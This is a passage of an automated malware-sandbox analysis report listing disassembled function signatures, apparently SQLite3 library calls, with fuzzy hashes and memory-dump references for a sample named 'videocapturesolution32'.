                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: memcmpsqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                          • String ID:
                                                          • API String ID: 4038589952-0
                                                          • Opcode ID: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                          • Instruction ID: 916146ddc5613ce70bfe97dc7fabc38680eb49f4f4fdba01105907ea2da9c682
                                                          • Opcode Fuzzy Hash: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                          • Instruction Fuzzy Hash: 87F13674A046158FDB18CFA9C590A9EB7F7AFA8308F248429E846AB355D774EC42CF40
                                                          APIs
                                                            • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                            • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                            • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                            • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                          • sqlite3_bind_int64.SQLITE3 ref: 6094C719
                                                          • sqlite3_step.SQLITE3 ref: 6094C72A
                                                          • sqlite3_reset.SQLITE3 ref: 6094C73B
                                                            • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                            • Part of subcall function 6094A9F5: sqlite3_free.SQLITE3(?,?,?,00000000,?,?,6094AC3F), ref: 6094AA7A
                                                          • sqlite3_free.SQLITE3 ref: 6094C881
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_bind_int64sqlite3_freesqlite3_resetsqlite3_step$memmovesqlite3_column_int64
                                                          • String ID:
                                                          • API String ID: 3487101843-0
                                                          • Opcode ID: 010aee262a3d8dae5049234a4ef50880699508b325a3cdc2c8e6f431e5b9abd3
                                                          • Instruction ID: dadb85a3919e548a164012fc2e04d9b0ab11445217433cc10b515e99a95ed5c3
                                                          • Opcode Fuzzy Hash: 010aee262a3d8dae5049234a4ef50880699508b325a3cdc2c8e6f431e5b9abd3
                                                          • Instruction Fuzzy Hash: 3681FA74A046098FCB44DF99C480A9DF7F7AFA8354F258529E855AB314EB34EC46CF90
                                                          APIs
                                                            • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                            • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                            • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                          • sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                            • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                          • sqlite3_column_int.SQLITE3 ref: 6096A3F3
                                                          • sqlite3_step.SQLITE3 ref: 6096A435
                                                          • sqlite3_reset.SQLITE3 ref: 6096A445
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_bind_intsqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_prepare_v2sqlite3_resetsqlite3_step
                                                          • String ID:
                                                          • API String ID: 247099642-0
                                                          • Opcode ID: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                          • Instruction ID: 69535c0605dcb565d56369453fd68d3a3097adfd173720c6e67b3d4aca8354ad
                                                          • Opcode Fuzzy Hash: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                          • Instruction Fuzzy Hash: FF2151B0A143148BEB109FA9D88479EB7FAEF64308F00852DE89597350EBB8D845CF51
                                                          APIs
                                                            • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                            • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                            • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                          • sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                            • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                          • sqlite3_step.SQLITE3 ref: 6096A32D
                                                          • sqlite3_column_int.SQLITE3 ref: 6096A347
                                                            • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                          • sqlite3_reset.SQLITE3 ref: 6096A354
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2sqlite3_resetsqlite3_stepsqlite3_value_int
                                                          • String ID:
                                                          • API String ID: 326482775-0
                                                          • Opcode ID: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                          • Instruction ID: 7c1586c82cd56d85cf32929a5cd575737867df940847ca2bf63216634e784e33
                                                          • Opcode Fuzzy Hash: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                          • Instruction Fuzzy Hash: 0E214DB0A043049BDB04DFA9C480B9EF7FAEFA8354F04C429E8959B340E778D8418B51
                                                          APIs
                                                            • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                            • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                            • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                          • sqlite3_bind_int64.SQLITE3 ref: 6095F83D
                                                            • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                          • sqlite3_bind_int64.SQLITE3 ref: 6095F85E
                                                          • sqlite3_step.SQLITE3 ref: 6095F869
                                                          • sqlite3_reset.SQLITE3 ref: 6095F874
                                                            • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                            • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_bind_int64sqlite3_mutex_leave$sqlite3_freesqlite3_mprintfsqlite3_mutex_entersqlite3_prepare_v2sqlite3_resetsqlite3_step
                                                          • String ID:
                                                          • API String ID: 2747803115-0
                                                          • Opcode ID: e7ba5a424be07f97404f27e37360827cc19527dc01f9216413d7b5c44ff8a2c2
                                                          • Instruction ID: f00e87c6dd3c8672f4b8fa92d33f96d93ee8ab4b9f2e93312e2458fba8eee522
                                                          • Opcode Fuzzy Hash: e7ba5a424be07f97404f27e37360827cc19527dc01f9216413d7b5c44ff8a2c2
                                                          • Instruction Fuzzy Hash: 9311DBB4A046049FCB04DF69C0C565AF7F6EFA8318F05C869E8898B349E735E894CB91
                                                          APIs
                                                          • sqlite3_bind_int64.SQLITE3 ref: 6094B71E
                                                            • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                          • sqlite3_bind_int64.SQLITE3 ref: 6094B73C
                                                          • sqlite3_step.SQLITE3 ref: 6094B74A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_bind_int64$sqlite3_mutex_leavesqlite3_step
                                                          • String ID:
                                                          • API String ID: 3305529457-0
                                                          • Opcode ID: dc92f9052f14c19b23696c87723feab2593fd922d888b89f432a916288e70c30
                                                          • Instruction ID: cea3564161c85327b61b62d60446574847d05a2bcfebeda4641ea5396b37aa5a
                                                          • Opcode Fuzzy Hash: dc92f9052f14c19b23696c87723feab2593fd922d888b89f432a916288e70c30
                                                          • Instruction Fuzzy Hash: D401A8B45047049FCB00DF19D9C968ABBE5FF98354F158869FC888B305D374E8548BA6
                                                          APIs
                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6090C1EA
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6090C22F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                          • String ID:
                                                          • API String ID: 1477753154-0
                                                          • Opcode ID: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                          • Instruction ID: fc120f7ed3300d8301d0f99cb769197b575d5683181bd6b289e4b53452841bc5
                                                          • Opcode Fuzzy Hash: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                          • Instruction Fuzzy Hash: 6501F4715042548BDB449F2EC4C576EBBEAEF65318F048469DD419B326D374D882CBA1
                                                          APIs
                                                            • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 609255B2
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_logsqlite3_mutex_leave
                                                          • String ID:
                                                          • API String ID: 1465156292-0
                                                          • Opcode ID: 61f2b65abbb078f396bfa931b2809e4962fa985140118a0fa907d432528e7d54
                                                          • Instruction ID: 19c4c58ecb434a21204d9b38047e93a23a7f28015e8477a734fda6841bb58fe8
                                                          • Opcode Fuzzy Hash: 61f2b65abbb078f396bfa931b2809e4962fa985140118a0fa907d432528e7d54
                                                          • Instruction Fuzzy Hash: 56317AB4A082188FCB04DF69D880A8EBBF6FF99314F008559FC5897348D734D940CBA5
                                                          APIs
                                                            • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 60925769
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_logsqlite3_mutex_leave
                                                          • String ID:
                                                          • API String ID: 1465156292-0
                                                          • Opcode ID: f78b12b45e858c7fd8cb74f5d211d4e30abbc68d4504511404b73e1b177a8d68
                                                          • Instruction ID: d5dd20366bd30be5098f9e48471fbeb1ccf01997be5a2761bb4486817e6b3aba
                                                          • Opcode Fuzzy Hash: f78b12b45e858c7fd8cb74f5d211d4e30abbc68d4504511404b73e1b177a8d68
                                                          • Instruction Fuzzy Hash: 23F08171A10A28D7CB106F29EC8958EBBB9FF69254B055058ECC1A730CDB35D925C791
                                                          APIs
                                                            • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 60925508
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_logsqlite3_mutex_leave
                                                          • String ID:
                                                          • API String ID: 1465156292-0
                                                          • Opcode ID: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                          • Instruction ID: ad89f0bb34aa7175efe61e1ac22fb0c12735e6005c3b9edbf096fd229bca234b
                                                          • Opcode Fuzzy Hash: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                          • Instruction Fuzzy Hash: 5A01A475B107148BCB109F2ACC8164BBBFAEF68254F05991AEC41DB315D775ED458BC0
                                                          APIs
                                                            • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_logsqlite3_mutex_leave
                                                          • String ID:
                                                          • API String ID: 1465156292-0
                                                          • Opcode ID: ebbe32869a67294cb2d54c108597a832b3743d43329dcf341f64f2493053d601
                                                          • Instruction ID: 4fd0dfe8dd6226820e052206e0db6187a6d8a97f2116fb4a305c2fd2856f8961
                                                          • Opcode Fuzzy Hash: ebbe32869a67294cb2d54c108597a832b3743d43329dcf341f64f2493053d601
                                                          • Instruction Fuzzy Hash: 94F08CB5A002099BCB00DF2AD88088ABBBAFF98264B05952AEC049B314D770E941CBD0
                                                          APIs
                                                            • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 60925678
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_logsqlite3_mutex_leave
                                                          • String ID:
                                                          • API String ID: 1465156292-0
                                                          • Opcode ID: 20ce1548f611e36a3668a48b9975394e1a388ab84833d9cb320a678b216caf11
                                                          • Instruction ID: bc2fa39936d9f4ed0ba1ebf98b65e017ff83ed2bbf5e058a49948814e7f33c49
                                                          • Opcode Fuzzy Hash: 20ce1548f611e36a3668a48b9975394e1a388ab84833d9cb320a678b216caf11
                                                          • Instruction Fuzzy Hash: 59E0EC74A042089BCB04DF6AD4C194AB7F9EF58258B14D665EC458B309E231E9858BC1
                                                          APIs
                                                          • sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                            • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_bind_int64sqlite3_mutex_leave
                                                          • String ID:
                                                          • API String ID: 3064317574-0
                                                          • Opcode ID: 8bfbb127be37b3944cf6aee767a60d103abce584902525ba566a621f413e0d82
                                                          • Instruction ID: 7a9bf9350bb0d435b7485bd9c083abc2dab3a9c90cc7cce47300d03dda88f0d0
                                                          • Opcode Fuzzy Hash: 8bfbb127be37b3944cf6aee767a60d103abce584902525ba566a621f413e0d82
                                                          • Instruction Fuzzy Hash: FFD092B4909309AFCB00EF29C48644EBBE5AF98258F40C82DFC98C7314E274E8408F92
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5c5aa561fe8b7943dde2a358ba30c2c8876ef78bddd50c77f68009583e67d90a
                                                          • Instruction ID: 29002ccca7877ead4b7e7e784383ace88c03f26ddf616943a2b43c0eb71ea2e3
                                                          • Opcode Fuzzy Hash: 5c5aa561fe8b7943dde2a358ba30c2c8876ef78bddd50c77f68009583e67d90a
                                                          • Instruction Fuzzy Hash: 36E0E2B850430DABDF00CF09D8C188A7BAAFB08364F10C119FC190B305C371E9548BA1
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c82c79c3d673ce5d83164ffe7b594e49b00bd73c00824d0aa5044480003c1f0d
                                                          • Instruction ID: a276b763828cd9d21177d39229c24ef0f5c00ef14d0f26540801fec71d9d5410
                                                          • Opcode Fuzzy Hash: c82c79c3d673ce5d83164ffe7b594e49b00bd73c00824d0aa5044480003c1f0d
                                                          • Instruction Fuzzy Hash: 29E0E2B850430DABDF00CF09D8C198A7BAAFB08264F10C119FC190B304C331E9148BE1
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                          • Instruction ID: aa639d4c52eda77921d109c173628d401b16d57fa3137d2b917a91732d8775c8
                                                          • Opcode Fuzzy Hash: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                          • Instruction Fuzzy Hash: D7C01265704208574B00E92DE8C154577AA9718164B108039E80B87301D975ED084291
                                                          APIs
                                                          • sqlite3_initialize.SQLITE3 ref: 6096C5BE
                                                            • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                          • sqlite3_log.SQLITE3 ref: 6096C5FC
                                                          • sqlite3_free.SQLITE3 ref: 6096C67E
                                                          • sqlite3_free.SQLITE3 ref: 6096CD71
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6096CD80
                                                          • sqlite3_errcode.SQLITE3 ref: 6096CD88
                                                          • sqlite3_close.SQLITE3 ref: 6096CD97
                                                          • sqlite3_create_function.SQLITE3 ref: 6096CDF8
                                                          Strings
